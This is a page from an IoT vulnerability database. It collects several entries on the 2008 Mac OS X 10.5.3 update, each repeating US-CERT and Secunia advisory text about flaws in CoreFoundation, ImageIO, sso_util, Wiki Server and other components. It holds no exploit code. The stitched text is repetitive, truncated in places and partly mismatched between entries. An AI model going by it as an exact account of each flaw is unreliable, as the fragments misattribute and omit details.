VARIoT IoT vulnerabilities database

Wiki Server in Apple Mac OS X 10.5 before 10.5.3 allows remote attackers to obtain sensitive information (user names) by reading the error message produced upon access to a nonexistent blog. A successful exploit of this issue may aid in further attacks. This issue affects Mac OS X Server 10.5 to 10.5.2. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. I. Further details are available in the US-CERT Vulnerability Notes Database. II. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-150A Feedback VU#566875" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History May 29 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBSD8M8XIHljM+H4irAQL8gggAhPXOm6pPXxrZpjiJYHmlhwCCIclyj9vo Yvs/cicI8vJ3vB4xkUd51/iFoze6D3mFnSxwVAgrixysdkaCxBUyWqmRumEDTXfx 403FR2yIFpSFr7+9VXXWpmq6E0aHVjrKPOArq5uysuIPOHiEbKUisT2gBXUlPrtN RjUg/w/9/IEryPxv/nVzHMcLDde2OLyoo+tiSCOqJK/sC/VUM/d1zkdIDOfu0zom vmqM10hDyA7VR2rgkKvSbqXOWHua0t4eHaNMP0h3N51yLmFhMHxBGj9zWXj9dpHI DcQ9gnQKm7YocOfLC4IPV0BWuPoAkNOEAPeRapPgmJ60icjOpn/MTQ== =QvSr -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. 1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory. 2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service). 3) An unspecified error in AppKit can potentially be exploited to execute arbitrary code when a user opens a specially crafted document file with an editor that uses AppKit (e.g. TextEdit). 4) Multiple unspecified errors exist in the processing of Pixlet video files. These can be exploited to cause memory corruption and potentially allow for execution of arbitrary code when a user opens a specially crafted movie file. 5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed. Successful exploitation may allow execution of arbitrary code. 6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request. 7) An integer overflow exists in CoreFoundation when handling CFData objects. This can be exploited to cause a heap-based buffer overflow if an application calls "CFDataReplaceBytes" with an invalid "length" argument. 8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened. 9) A weakness is caused due to users not being warned before opening certain potentially unsafe content types. 10) An error when printing to password-protected printers with debug logging enabled may lead to the disclosure of sensitive information. 11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system. For more information: SA28083 12) An integer underflow error in Help Viewer when handling help:topic URLs can be exploited to cause a buffer overflow when a specially crafted help:topic URL is accessed. Successful exploitation may allow execution of arbitrary code. 13) A conversion error exists in ICU when handling certain character encodings. This can potentially be exploited bypass content filters and may lead to cross-site scripting and disclosure of sensitive information. 14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks. 15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture. 16) A boundary error in the BMP and GIF image decoding engine in ImageIO can be exploited to disclose content in memory. 17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerabilities are caused due to the use of vulnerable libpng code. For more information: SA27093 SA27130 18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed. Successful exploitation of this vulnerability may allow execution of arbitrary code. 19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6. 20) A vulnerability in Mongrel can be exploited by malicious people to disclose sensitive information. For more information: SA28323 21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords. ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897 OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/ SA18307: http://secunia.com/advisories/18307/ SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ SA27093: http://secunia.com/advisories/27093/ SA27130: http://secunia.com/advisories/27130/ SA28081: http://secunia.com/advisories/28081/ SA28083: http://secunia.com/advisories/28083/ SA28323: http://secunia.com/advisories/28323/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The sso_util program in Single Sign-On in Apple Mac OS X before 10.5.3 places passwords on the command line, which allows local users to obtain sensitive information by listing the process. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. Local attackers can leverage this issue to gain access to sensitive information that will aid in further attacks. This issue affects Mac OS X 10.4.11, Mac OS X Server 10.4.11, Mac OS X 10.5 - 10.5.2, and Mac OS X Server 10.5 - 10.5.2. Leaked passwords include user, administrator, and KDC administrative passwords. I. Further details are available in the US-CERT Vulnerability Notes Database. II. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-150A Feedback VU#566875" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History May 29 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBSD8M8XIHljM+H4irAQL8gggAhPXOm6pPXxrZpjiJYHmlhwCCIclyj9vo Yvs/cicI8vJ3vB4xkUd51/iFoze6D3mFnSxwVAgrixysdkaCxBUyWqmRumEDTXfx 403FR2yIFpSFr7+9VXXWpmq6E0aHVjrKPOArq5uysuIPOHiEbKUisT2gBXUlPrtN RjUg/w/9/IEryPxv/nVzHMcLDde2OLyoo+tiSCOqJK/sC/VUM/d1zkdIDOfu0zom vmqM10hDyA7VR2rgkKvSbqXOWHua0t4eHaNMP0h3N51yLmFhMHxBGj9zWXj9dpHI DcQ9gnQKm7YocOfLC4IPV0BWuPoAkNOEAPeRapPgmJ60icjOpn/MTQ== =QvSr -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. 1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory. 2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service). 3) An unspecified error in AppKit can potentially be exploited to execute arbitrary code when a user opens a specially crafted document file with an editor that uses AppKit (e.g. TextEdit). 4) Multiple unspecified errors exist in the processing of Pixlet video files. These can be exploited to cause memory corruption and potentially allow for execution of arbitrary code when a user opens a specially crafted movie file. 5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed. Successful exploitation may allow execution of arbitrary code. 6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request. 7) An integer overflow exists in CoreFoundation when handling CFData objects. This can be exploited to cause a heap-based buffer overflow if an application calls "CFDataReplaceBytes" with an invalid "length" argument. 8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened. 9) A weakness is caused due to users not being warned before opening certain potentially unsafe content types. 10) An error when printing to password-protected printers with debug logging enabled may lead to the disclosure of sensitive information. 11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system. For more information: SA28083 12) An integer underflow error in Help Viewer when handling help:topic URLs can be exploited to cause a buffer overflow when a specially crafted help:topic URL is accessed. Successful exploitation may allow execution of arbitrary code. 13) A conversion error exists in ICU when handling certain character encodings. This can potentially be exploited bypass content filters and may lead to cross-site scripting and disclosure of sensitive information. 14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks. 15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture. 16) A boundary error in the BMP and GIF image decoding engine in ImageIO can be exploited to disclose content in memory. 17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerabilities are caused due to the use of vulnerable libpng code. For more information: SA27093 SA27130 18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed. Successful exploitation of this vulnerability may allow execution of arbitrary code. 19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6. 20) A vulnerability in Mongrel can be exploited by malicious people to disclose sensitive information. For more information: SA28323 21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords. 22) An error in Wiki Server can be exploited to determine valid local user names when nonexistent blogs are accessed. ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897 OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/ SA18307: http://secunia.com/advisories/18307/ SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ SA27093: http://secunia.com/advisories/27093/ SA27130: http://secunia.com/advisories/27130/ SA28081: http://secunia.com/advisories/28081/ SA28083: http://secunia.com/advisories/28083/ SA28323: http://secunia.com/advisories/28323/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Incomplete blacklist vulnerability in CoreTypes in Apple Mac OS X before 10.5.3 allows user-assisted remote attackers to execute arbitrary code via an (1) Automator, (2) Help, (3) Safari, or (4) Terminal content type for a downloadable object, which does not trigger a "potentially unsafe" warning message in (a) the Download Validation feature in Mac OS X 10.4 or (b) the Quarantine feature in Mac OS X 10.5. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. This issue can lead to a false sense of security, potentially aiding in network-based attacks. This issue affects Mac OS X 10.4.11, Mac OS X Server 10.4.11, Mac OS X 10.5 - 10.5.2, and Mac OS X Server 10.5 - 10.5.2. NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability. Although these content types are not automatically enabled, they can still lead to malicious payloads if they are manually enabled. I. Further details are available in the US-CERT Vulnerability Notes Database. II. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-150A Feedback VU#566875" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History May 29 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBSD8M8XIHljM+H4irAQL8gggAhPXOm6pPXxrZpjiJYHmlhwCCIclyj9vo Yvs/cicI8vJ3vB4xkUd51/iFoze6D3mFnSxwVAgrixysdkaCxBUyWqmRumEDTXfx 403FR2yIFpSFr7+9VXXWpmq6E0aHVjrKPOArq5uysuIPOHiEbKUisT2gBXUlPrtN RjUg/w/9/IEryPxv/nVzHMcLDde2OLyoo+tiSCOqJK/sC/VUM/d1zkdIDOfu0zom vmqM10hDyA7VR2rgkKvSbqXOWHua0t4eHaNMP0h3N51yLmFhMHxBGj9zWXj9dpHI DcQ9gnQKm7YocOfLC4IPV0BWuPoAkNOEAPeRapPgmJ60icjOpn/MTQ== =QvSr -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. 1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory. 2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service). 3) An unspecified error in AppKit can potentially be exploited to execute arbitrary code when a user opens a specially crafted document file with an editor that uses AppKit (e.g. TextEdit). 4) Multiple unspecified errors exist in the processing of Pixlet video files. These can be exploited to cause memory corruption and potentially allow for execution of arbitrary code when a user opens a specially crafted movie file. 5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed. Successful exploitation may allow execution of arbitrary code. 6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request. 7) An integer overflow exists in CoreFoundation when handling CFData objects. This can be exploited to cause a heap-based buffer overflow if an application calls "CFDataReplaceBytes" with an invalid "length" argument. 8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened. 10) An error when printing to password-protected printers with debug logging enabled may lead to the disclosure of sensitive information. 11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system. For more information: SA28083 12) An integer underflow error in Help Viewer when handling help:topic URLs can be exploited to cause a buffer overflow when a specially crafted help:topic URL is accessed. Successful exploitation may allow execution of arbitrary code. 13) A conversion error exists in ICU when handling certain character encodings. This can potentially be exploited bypass content filters and may lead to cross-site scripting and disclosure of sensitive information. 14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks. 15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture. 16) A boundary error in the BMP and GIF image decoding engine in ImageIO can be exploited to disclose content in memory. 17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerabilities are caused due to the use of vulnerable libpng code. For more information: SA27093 SA27130 18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed. Successful exploitation of this vulnerability may allow execution of arbitrary code. 19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6. 20) A vulnerability in Mongrel can be exploited by malicious people to disclose sensitive information. For more information: SA28323 21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords. 22) An error in Wiki Server can be exploited to determine valid local user names when nonexistent blogs are accessed. ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897 OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/ SA18307: http://secunia.com/advisories/18307/ SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ SA27093: http://secunia.com/advisories/27093/ SA27130: http://secunia.com/advisories/27130/ SA28081: http://secunia.com/advisories/28081/ SA28083: http://secunia.com/advisories/28083/ SA28323: http://secunia.com/advisories/28323/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Integer overflow in the CFDataReplaceBytes function in the CFData API in CoreFoundation in Apple Mac OS X before 10.5.3 allows context-dependent attackers to execute arbitrary code or cause a denial of service (crash) via an invalid length argument, which triggers a heap-based buffer overflow. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. Apple Mac OS X is prone to a remote code-execution vulnerability affecting CoreFoundation. Successful exploits will allow attackers to execute arbitrary code in the context of the affected component. Failed exploit attempts will likely result in denial-of-service conditions. This issue affects Mac OS X 10.4.11, Mac OS X Server 10.4.11, Mac OS X 10.5 - 10.5.2, and Mac OS X Server 10.5 - 10.5.2. NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability. I. Further details are available in the US-CERT Vulnerability Notes Database. II. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-150A Feedback VU#566875" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History May 29 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBSD8M8XIHljM+H4irAQL8gggAhPXOm6pPXxrZpjiJYHmlhwCCIclyj9vo Yvs/cicI8vJ3vB4xkUd51/iFoze6D3mFnSxwVAgrixysdkaCxBUyWqmRumEDTXfx 403FR2yIFpSFr7+9VXXWpmq6E0aHVjrKPOArq5uysuIPOHiEbKUisT2gBXUlPrtN RjUg/w/9/IEryPxv/nVzHMcLDde2OLyoo+tiSCOqJK/sC/VUM/d1zkdIDOfu0zom vmqM10hDyA7VR2rgkKvSbqXOWHua0t4eHaNMP0h3N51yLmFhMHxBGj9zWXj9dpHI DcQ9gnQKm7YocOfLC4IPV0BWuPoAkNOEAPeRapPgmJ60icjOpn/MTQ== =QvSr -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. 1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory. 2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service). 3) An unspecified error in AppKit can potentially be exploited to execute arbitrary code when a user opens a specially crafted document file with an editor that uses AppKit (e.g. TextEdit). 4) Multiple unspecified errors exist in the processing of Pixlet video files. These can be exploited to cause memory corruption and potentially allow for execution of arbitrary code when a user opens a specially crafted movie file. 5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed. 6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request. 7) An integer overflow exists in CoreFoundation when handling CFData objects. 8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened. 9) A weakness is caused due to users not being warned before opening certain potentially unsafe content types. 10) An error when printing to password-protected printers with debug logging enabled may lead to the disclosure of sensitive information. 11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system. For more information: SA28083 12) An integer underflow error in Help Viewer when handling help:topic URLs can be exploited to cause a buffer overflow when a specially crafted help:topic URL is accessed. 13) A conversion error exists in ICU when handling certain character encodings. This can potentially be exploited bypass content filters and may lead to cross-site scripting and disclosure of sensitive information. 14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks. 15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture. 16) A boundary error in the BMP and GIF image decoding engine in ImageIO can be exploited to disclose content in memory. 17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerabilities are caused due to the use of vulnerable libpng code. For more information: SA27093 SA27130 18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed. 19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6. 20) A vulnerability in Mongrel can be exploited by malicious people to disclose sensitive information. For more information: SA28323 21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords. 22) An error in Wiki Server can be exploited to determine valid local user names when nonexistent blogs are accessed. ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897 OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/ SA18307: http://secunia.com/advisories/18307/ SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ SA27093: http://secunia.com/advisories/27093/ SA27130: http://secunia.com/advisories/27130/ SA28081: http://secunia.com/advisories/28081/ SA28083: http://secunia.com/advisories/28083/ SA28323: http://secunia.com/advisories/28323/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The BMP and GIF image decoding engine in ImageIO in Apple Mac OS X before 10.5.3 allows remote attackers to obtain sensitive information (memory contents) via a crafted (1) BMP or (2) GIF image, which causes an out-of-bounds read. Apple Safari automatically executes downloaded files based on Internet Explorer zone settings, which can allow a remote attacker to execute arbitrary code on a vulnerable system. The security update addresses a total of 19 new vulnerabilities that affect the AFP Server, AppKit, Apple Pixlet Video, ATS, CFNetwork, CoreFoundation, CoreGraphics, CoreTypes, CUPS, Help Viewer, iCal, International Components for Unicode, Image Capture, ImageIO, Kernel, Mail, Single Sign-On, and Wiki Server components of Mac OS X. Apple Mac OS X is prone to an information-disclosure vulnerability that occurs in ImageIO. An attacker can exploit this issue to obtain sensitive information that may lead to further attacks. This issue affects Mac OS X 10.4.11, Mac OS X Server 10.4.11, Mac OS X 10.5 - 10.5.2, and Mac OS X Server 10.5 - 10.5.2. NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability. I. Further details are available in the US-CERT Vulnerability Notes Database. II. III. These and other updates are available via Software Update or via Apple Downloads. IV. Please send email to <cert@cert.org> with "TA08-150A Feedback VU#566875" in the subject. _________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. _________________________________________________________________ Produced 2008 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History May 29 2008: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBSD8M8XIHljM+H4irAQL8gggAhPXOm6pPXxrZpjiJYHmlhwCCIclyj9vo Yvs/cicI8vJ3vB4xkUd51/iFoze6D3mFnSxwVAgrixysdkaCxBUyWqmRumEDTXfx 403FR2yIFpSFr7+9VXXWpmq6E0aHVjrKPOArq5uysuIPOHiEbKUisT2gBXUlPrtN RjUg/w/9/IEryPxv/nVzHMcLDde2OLyoo+tiSCOqJK/sC/VUM/d1zkdIDOfu0zom vmqM10hDyA7VR2rgkKvSbqXOWHua0t4eHaNMP0h3N51yLmFhMHxBGj9zWXj9dpHI DcQ9gnQKm7YocOfLC4IPV0BWuPoAkNOEAPeRapPgmJ60icjOpn/MTQ== =QvSr -----END PGP SIGNATURE----- . ---------------------------------------------------------------------- Secunia Network Software Inspector 2.0 (NSI) - Public Beta The Public Beta has ended. Thanks to all that participated. 1) An error in AFP server allows connected users or guests to access files and directories that are not within a shared directory. 2) Some vulnerabilities in Apache can be exploited by malicious people to conduct cross-site scripting attacks or to cause a DoS (Denial of Service). TextEdit). 4) Multiple unspecified errors exist in the processing of Pixlet video files. 5) An unspecified error exists in Apple Type Services when processing embedded fonts in PDF files. This can be exploited to cause a memory corruption when a PDF file containing a specially crafted embedded font is printed. Successful exploitation may allow execution of arbitrary code. 6) An error in Safari's SSL client certificate handling can lead to an information disclosure of the first client certificate found in the keychain when a web server issues a client certificate request. 7) An integer overflow exists in CoreFoundation when handling CFData objects. This can be exploited to cause a heap-based buffer overflow if an application calls "CFDataReplaceBytes" with an invalid "length" argument. 8) An error due to an uninitialised variable in CoreGraphics can potentially be exploited to execute arbitrary code when a specially crafted PDF is opened. 9) A weakness is caused due to users not being warned before opening certain potentially unsafe content types. 10) An error when printing to password-protected printers with debug logging enabled may lead to the disclosure of sensitive information. 11) Some vulnerabilities in Adobe Flash Player can be exploited by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, or to potentially compromise a user's system. Successful exploitation may allow execution of arbitrary code. 13) A conversion error exists in ICU when handling certain character encodings. 14) Input passed to unspecified parameters in Image Capture's embedded web server is not properly sanitised before being used. This can be exploited to disclose the content of local files via directory traversal attacks. 15) An error in the handling of temporary files in Image Capture can be exploited by malicious, local users to manipulate files with the privilege of a user running Image Capture. 17) Some vulnerabilities in ImageIO can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerabilities are caused due to the use of vulnerable libpng code. For more information: SA27093 SA27130 18) An integer overflow error in ImageIO within the processing of JPEG2000 images can be exploited to cause a heap-based buffer overflow when a specially crafted JPEG2000 image is viewed. Successful exploitation of this vulnerability may allow execution of arbitrary code. 19) An error in Mail is caused due to an uninitialised variable and can lead to disclosure of sensitive information and potentially execution of arbitrary code when mail is sent through an SMTP server over IPv6. For more information: SA28323 21) The sso_util command-line tool requires that passwords be passed to it in its arguments, which can be exploited by malicious, local users to disclose the passwords. 22) An error in Wiki Server can be exploited to determine valid local user names when nonexistent blogs are accessed. ORIGINAL ADVISORY: http://support.apple.com/kb/HT1897 OTHER REFERENCES: SA18008: http://secunia.com/advisories/18008/ SA18307: http://secunia.com/advisories/18307/ SA26273: http://secunia.com/advisories/26273/ SA26636: http://secunia.com/advisories/26636/ SA27093: http://secunia.com/advisories/27093/ SA27130: http://secunia.com/advisories/27130/ SA28081: http://secunia.com/advisories/28081/ SA28083: http://secunia.com/advisories/28083/ SA28323: http://secunia.com/advisories/28323/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . The vulnerabilities are reported in Safari for Windows prior to version 3.1.2. SOLUTION: Update to version 3.1.2. http://www.apple.com/support/downloads/safari312forwindows.html PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Gynvael Coldwind, Hispasec 2) Will Dormann, CERT/CC 3) James Urquhart CHANGELOG: 2008-06-20: Added link to US-CERT

